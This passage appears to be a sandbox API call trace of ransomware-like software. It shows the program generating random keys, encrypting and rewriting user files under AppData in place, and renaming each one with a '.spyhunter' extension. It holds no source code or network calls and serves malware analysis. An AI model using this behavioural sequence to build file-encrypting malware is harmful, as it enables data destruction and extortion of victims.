[0138.601] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.601] WriteFile (in: hFile=0x178, lpBuffer=0x57f344*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x57f344*, lpNumberOfBytesWritten=0x57f304*=0x4, lpOverlapped=0x0) returned 1 [0138.601] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f304*=0x30, lpOverlapped=0x0) returned 1 [0138.601] CloseHandle (hObject=0x178) returned 1 [0138.601] GetProcessHeap () returned 0x2c0000 [0138.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0138.601] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.spyhunter") returned 139 [0138.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl.spyhunter")) returned 1 [0138.602] GetProcessHeap () returned 0x2c0000 [0138.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0138.602] GetProcessHeap () returned 0x2c0000 [0138.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.602] GetProcessHeap () returned 0x2c0000 [0138.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc43e8 | out: hHeap=0x2c0000) returned 1 [0138.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f340 | out: pbBuffer=0x57f340) returned 1 [0138.603] GetProcessHeap () returned 0x2c0000 [0138.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f338*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f338*=0x30) returned 1 [0138.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.603] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0138.603] StrStrW (lpFirst="content14.dat", lpSrch=".txt") returned 0x0 [0138.603] GetProcessHeap () returned 0x2c0000 [0138.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.603] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2fc*=0x2800, lpOverlapped=0x0) returned 1 [0138.639] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.639] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2fc*=0x2800, lpOverlapped=0x0) returned 1 [0138.653] GetProcessHeap () returned 0x2c0000 [0138.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.653] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.653] WriteFile (in: hFile=0x178, lpBuffer=0x57f33c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x57f33c*, lpNumberOfBytesWritten=0x57f2fc*=0x4, lpOverlapped=0x0) returned 1 [0138.664] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2fc*=0x30, lpOverlapped=0x0) returned 1 [0138.664] CloseHandle (hObject=0x178) returned 1 [0138.665] GetProcessHeap () returned 0x2c0000 [0138.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0138.665] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.spyhunter") returned 87 [0138.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat.spyhunter")) returned 1 [0138.665] GetProcessHeap () returned 0x2c0000 [0138.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0138.665] GetProcessHeap () returned 0x2c0000 [0138.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.666] GetProcessHeap () returned 0x2c0000 [0138.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e738 | out: hHeap=0x2c0000) returned 1 [0138.666] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f340 | out: pbBuffer=0x57f340) returned 1 [0138.666] GetProcessHeap () returned 0x2c0000 [0138.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f338*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f338*=0x30) returned 1 [0138.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0138.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0138.959] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0138.959] GetProcessHeap () returned 0x2c0000 [0138.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.959] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f2fc*=0x0, lpOverlapped=0x0) returned 1 [0138.959] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.959] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f2fc*=0x0, lpOverlapped=0x0) returned 1 [0138.959] GetProcessHeap () returned 0x2c0000 [0138.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.959] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.959] WriteFile (in: hFile=0xec, lpBuffer=0x57f33c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x57f33c*, lpNumberOfBytesWritten=0x57f2fc*=0x4, lpOverlapped=0x0) returned 1 [0138.960] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2fc*=0x30, lpOverlapped=0x0) returned 1 [0138.960] CloseHandle (hObject=0xec) returned 1 [0138.960] GetProcessHeap () returned 0x2c0000 [0138.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0138.960] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.spyhunter") returned 96 [0138.960] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.spyhunter")) returned 1 [0138.961] GetProcessHeap () returned 0x2c0000 [0138.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0138.961] GetProcessHeap () returned 0x2c0000 [0138.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.961] GetProcessHeap () returned 0x2c0000 [0138.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f398f0 | out: hHeap=0x2c0000) returned 1 [0138.965] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f330 | out: pbBuffer=0x57f330) returned 1 [0138.965] GetProcessHeap () returned 0x2c0000 [0138.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.965] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f328*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f328*=0x30) returned 1 [0138.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0138.966] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0138.966] StrStrW (lpFirst="Settings.ini", lpSrch=".txt") returned 0x0 [0138.966] GetProcessHeap () returned 0x2c0000 [0138.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.966] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f2ec*=0x54, lpOverlapped=0x0) returned 1 [0138.967] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.967] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x57f2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f2ec*=0x54, lpOverlapped=0x0) returned 1 [0138.967] GetProcessHeap () returned 0x2c0000 [0138.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.967] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.967] WriteFile (in: hFile=0xec, lpBuffer=0x57f32c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2ec, lpOverlapped=0x0 | out: lpBuffer=0x57f32c*, lpNumberOfBytesWritten=0x57f2ec*=0x4, lpOverlapped=0x0) returned 1 [0138.967] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2ec*=0x30, lpOverlapped=0x0) returned 1 [0138.967] CloseHandle (hObject=0xec) returned 1 [0138.967] GetProcessHeap () returned 0x2c0000 [0138.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0138.968] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.spyhunter") returned 96 [0138.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.spyhunter")) returned 1 [0139.038] GetProcessHeap () returned 0x2c0000 [0139.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.038] GetProcessHeap () returned 0x2c0000 [0139.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.038] GetProcessHeap () returned 0x2c0000 [0139.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39ae0 | out: hHeap=0x2c0000) returned 1 [0139.038] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f328 | out: pbBuffer=0x57f328) returned 1 [0139.038] GetProcessHeap () returned 0x2c0000 [0139.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f320*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f320*=0x30) returned 1 [0139.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.039] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0139.039] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".txt") returned 0x0 [0139.039] GetProcessHeap () returned 0x2c0000 [0139.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.039] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f2e4*=0x1f2, lpOverlapped=0x0) returned 1 [0139.040] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.041] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f2e4*=0x1f2, lpOverlapped=0x0) returned 1 [0139.041] GetProcessHeap () returned 0x2c0000 [0139.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.041] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.041] WriteFile (in: hFile=0xec, lpBuffer=0x57f324*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x57f324*, lpNumberOfBytesWritten=0x57f2e4*=0x4, lpOverlapped=0x0) returned 1 [0139.041] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2e4*=0x30, lpOverlapped=0x0) returned 1 [0139.041] CloseHandle (hObject=0xec) returned 1 [0139.041] GetProcessHeap () returned 0x2c0000 [0139.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.041] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.spyhunter") returned 98 [0139.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.spyhunter")) returned 1 [0139.072] GetProcessHeap () returned 0x2c0000 [0139.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.072] GetProcessHeap () returned 0x2c0000 [0139.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.072] GetProcessHeap () returned 0x2c0000 [0139.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45e28 | out: hHeap=0x2c0000) returned 1 [0139.072] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f328 | out: pbBuffer=0x57f328) returned 1 [0139.072] GetProcessHeap () returned 0x2c0000 [0139.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.072] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f320*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f320*=0x30) returned 1 [0139.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.075] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 95 [0139.075] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".txt") returned 0x0 [0139.075] GetProcessHeap () returned 0x2c0000 [0139.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.075] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2e4*=0xe8, lpOverlapped=0x0) returned 1 [0139.076] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.076] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2e4*=0xe8, lpOverlapped=0x0) returned 1 [0139.076] GetProcessHeap () returned 0x2c0000 [0139.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.076] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.076] WriteFile (in: hFile=0x184, lpBuffer=0x57f324*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x57f324*, lpNumberOfBytesWritten=0x57f2e4*=0x4, lpOverlapped=0x0) returned 1 [0139.076] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2e4*=0x30, lpOverlapped=0x0) returned 1 [0139.077] CloseHandle (hObject=0x184) returned 1 [0139.077] GetProcessHeap () returned 0x2c0000 [0139.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.077] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.spyhunter") returned 105 [0139.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.spyhunter")) returned 1 [0139.077] GetProcessHeap () returned 0x2c0000 [0139.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.078] GetProcessHeap () returned 0x2c0000 [0139.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.078] GetProcessHeap () returned 0x2c0000 [0139.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbfbb0 | out: hHeap=0x2c0000) returned 1 [0139.078] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f320 | out: pbBuffer=0x57f320) returned 1 [0139.078] GetProcessHeap () returned 0x2c0000 [0139.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.078] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f318*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f318*=0x30) returned 1 [0139.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 98 [0139.078] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".txt") returned 0x0 [0139.078] GetProcessHeap () returned 0x2c0000 [0139.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.078] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2dc*=0x127e, lpOverlapped=0x0) returned 1 [0139.080] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.080] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2dc*=0x127e, lpOverlapped=0x0) returned 1 [0139.080] GetProcessHeap () returned 0x2c0000 [0139.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.080] SetFilePointerEx (in: hFile=0x184, 